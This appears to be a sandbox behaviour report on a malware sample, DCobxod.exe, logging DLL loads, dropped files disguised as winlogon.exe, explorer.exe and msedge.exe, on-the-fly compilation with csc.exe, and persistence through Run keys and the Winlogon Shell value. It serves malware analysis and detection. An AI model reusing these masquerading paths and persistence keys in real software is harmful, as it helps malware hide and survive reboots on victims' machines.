                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: apphelp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: version.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: uxtheme.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: windows.storage.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: wldp.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: profapi.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: cryptsp.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: rsaenh.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: cryptbase.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: sspicli.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: mscoree.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: kernel.appcore.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: version.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: vcruntime140_clr0400.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\ProgramData\SoftwareDistribution\winlogon.exe Section loaded: uxtheme.dll
                                     Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                                     Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
                                     Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
                                     Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
                                     Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
                                     Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
                                     Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
                                     Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
                                     Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: mscoree.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: kernel.appcore.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: version.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: vcruntime140_clr0400.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: uxtheme.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: windows.storage.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: wldp.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: profapi.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: cryptsp.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: rsaenh.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: cryptbase.dll
                                     Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe Section loaded: sspicli.dll
                                     Source: C:\Browserhost\intoHostperf.exe Section loaded: mscoree.dll
                                     Source: C:\Browserhost\intoHostperf.exe Section loaded: kernel.appcore.dll
                                     Source: C:\Browserhost\intoHostperf.exe Section loaded: version.dll
                                     Source: C:\Browserhost\intoHostperf.exe Section loaded: vcruntime140_clr0400.dll
                                     Source: C:\Browserhost\intoHostperf.exe Section loaded: ucrtbase_clr0400.dll
                                     Source: C:\Browserhost\intoHostperf.exe Section loaded: uxtheme.dll
                                     Source: C:\Browserhost\intoHostperf.exe Section loaded: windows.storage.dll
                                     Source: C:\Browserhost\intoHostperf.exe Section loaded: wldp.dll
                                     Source: C:\Users\user\Desktop\DCobxod.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                     Source: Window Recorder Window detected: More than 3 window changes detected
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                     Source: DCobxod.exe Static file information: File size 36950717 > 1048576
                                     Source: DCobxod.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                     Source: DCobxod.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                     Source: DCobxod.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                     Source: DCobxod.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                     Source: DCobxod.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                     Source: DCobxod.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                     Source: DCobxod.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                     Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCobxod.exe
                                     Source: Binary string: 8C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.pdb source: intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp
                                     Source: Binary string: 8C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.pdb source: intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp
                                     Source: DCobxod.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                     Source: DCobxod.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                     Source: DCobxod.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                     Source: DCobxod.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                     Source: DCobxod.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                     Source: C:\Browserhost\intoHostperf.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"
                                     Source: C:\Browserhost\intoHostperf.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"
                                     Source: C:\Users\user\Desktop\DCobxod.exe File created: C:\Browserhost\__tmp_rar_sfx_access_check_7127875
                                     Source: DCobxod.exe Static PE information: section name: .didat
                                     Source: C:\Users\user\Desktop\DCobxod.exe Code function: 0_2_0042F640 push ecx; ret 0_2_0042F653
                                     Source: C:\Users\user\Desktop\DCobxod.exe Code function: 0_2_0042EB78 push eax; ret 0_2_0042EB96
                                     Source: C:\Browserhost\intoHostperf.exe Code function: 5_2_00007FF848D900BD pushad ; iretd 5_2_00007FF848D900C1

                                    Persistence and Installation Behavior

                                     Source: C:\Browserhost\intoHostperf.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 identical entries)
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
                                     Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                     Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\HhGhtKRk.log
                                     Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\ProgramData\SoftwareDistribution\winlogon.exe
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\jcBCwIrh.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Recovery\upfc.exe
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\QuHEOinP.log
                                     Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\GTYGJoJn.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\TkyvVenI.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\WuUwVxTJ.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\zmrZuvIB.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe
                                     Source: C:\Users\user\Desktop\DCobxod.exe File created: C:\Browserhost\intoHostperf.exe
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\pEXJLSDT.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\bnxVycYy.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Browserhost\LaSqLWtOcizKrlm.exe
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\urpInPSH.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\NzFoXiJZ.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\wtcqJyWC.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\kIWsDnNZ.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\DaJYXsXp.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\xpPRZvtG.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\QQZxdmXS.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\AkShQvXv.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\CdhQCsIu.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\nBlbpjyY.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\ZuimMgmz.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\TBFNkAhL.log
                                     Source: C:\Browserhost\intoHostperf.exe File created: C:\Users\user\Desktop\XrvErxiE.log

                                    Boot Survival

                                     Source: C:\Browserhost\intoHostperf.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (6 identical entries)
                                     Source: C:\Browserhost\intoHostperf.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run intoHostperf
                                     Source: C:\Browserhost\intoHostperf.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfc
                                     Source: C:\Browserhost\intoHostperf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                                     Source: C:\Browserhost\intoHostperf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer
                                     Source: C:\Browserhost\intoHostperf.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlm
                                     Source: C:\Browserhost\intoHostperf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfc
                                     Source: C:\Browserhost\intoHostperf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlm
                                     Source: C:\Browserhost\intoHostperf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run intoHostperf

                                    Hooking and other Techniques for Hiding and Protection

                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\DCobxod.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Browserhost\intoHostperf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\upfc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
